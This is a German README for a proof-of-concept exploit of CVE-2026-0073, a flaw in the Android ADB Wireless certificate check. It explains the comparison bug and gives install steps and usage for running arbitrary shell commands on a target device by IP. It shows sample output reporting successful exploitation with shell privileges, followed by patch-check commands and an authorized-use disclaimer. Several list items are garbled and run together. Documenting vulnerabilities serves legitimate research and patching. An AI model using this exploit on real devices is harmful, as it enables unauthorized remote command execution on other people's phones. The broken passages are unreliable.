
CVE-2026-0073 – PoC zur Umgehung der gegenseitigen Authentifizierung bei ADB Wireless
Dieses Verzeichnis enthält einen Python-Proof-of-Concept für CVE-2026-0073.
Das Skript wurde mit KI-gestützten Codegenerierungstechniken erstellt.
CVE-2026-0073 ist ein Logikfehler in der Zertifikatsprüfung des ADB-Daemons (adbd_tls_verify_cert in auth.cpp).
Die anfällige Prüfung behandelt jeden Rückgabewert ungleich Null von EVP_PKEY_cmp(...) als erfolgreiche Übereinstimmung.
Die erwartete Behandlung des Vergleichsergebnisses sollte sein:
1 = Schlüssel stimmen überein0 = Schlüssel stimmen nicht übereinIn anfälligen Builds werden negative Werte als wahr behandelt und können ein Zertifikat fälschlicherweise als autorisiert markieren.
poc-cve-2026-0073.py tutDas Skript:
ec oder ed25519).shell: mit exec:-Fallback).cryptography-PaketAbhängigkeit installieren:
pip install cryptography
ADB-Dienst des Ziels ermitteln (falls erforderlich):
adb mdns services
PoC ausführen:
python3 poc-cve-2026-0073.py <target_ip> [port] [command] [key_type] [--verbose]
Argumente:
target_ip: IP-Adresse des Ziel-Android-Gerätsport: ADB-Port (Standard: 5555)command: Auszuführender Befehl (Standard: id)key_type: ec oder ed25519 (Standard: ec)--verbose: Protokolldebug-Logs aktivierenBeispiele:
python3 poc-cve-2026-0073.py 192.168.1.100 5555 id
python3 poc-cve-2026-0073.py 192.168.1.100 5555 whoami ec --verbose
python3 poc-cve-2026-0073.py 192.168.1.100 5555 getprop ed25519
[*] Opening service: 'shell:id'
[*] After OPEN, received: OKAY arg0=2 data=b''
[+] Stream open (local_id=1, remote_id=2)
[+] Command output:
----------------------------------------
uid=2000(shell) gid=2000(shell) ...
----------------------------------------
[+] Exploitation successful.
Connection refused
certificate_unknown
Timeout beim Warten auf Antworten
--verbose für Paketebenen-Traces erneut versuchen.Das Sicherheitspatchlevel des Basisbetriebssystems und das Patchen der Mainline-Module können sich unterscheiden. Ein Gerät kann einen älteren monatlichen SPL anzeigen, während es neuere ADB-Modulkorrekturen erhält.
Nützliche Prüfungen:
adb shell getprop ro.build.version.security_patch
adb shell pm list packages --apex-only | grep adbd
adb shell dumpsys package com.google.android.adbd | grep -E "versionCode|versionName|lastUpdateTime"
Verwenden Sie diesen PoC nur in autorisierten Umgebungen (eigene Laborgeräte, ausdrückliche Genehmigung oder genehmigte Tests). Führen Sie ihn nicht gegen Systeme aus, die Sie nicht besitzen oder für die Sie keine schriftliche Genehmigung zum Testen haben.
daemon/auth.cpp)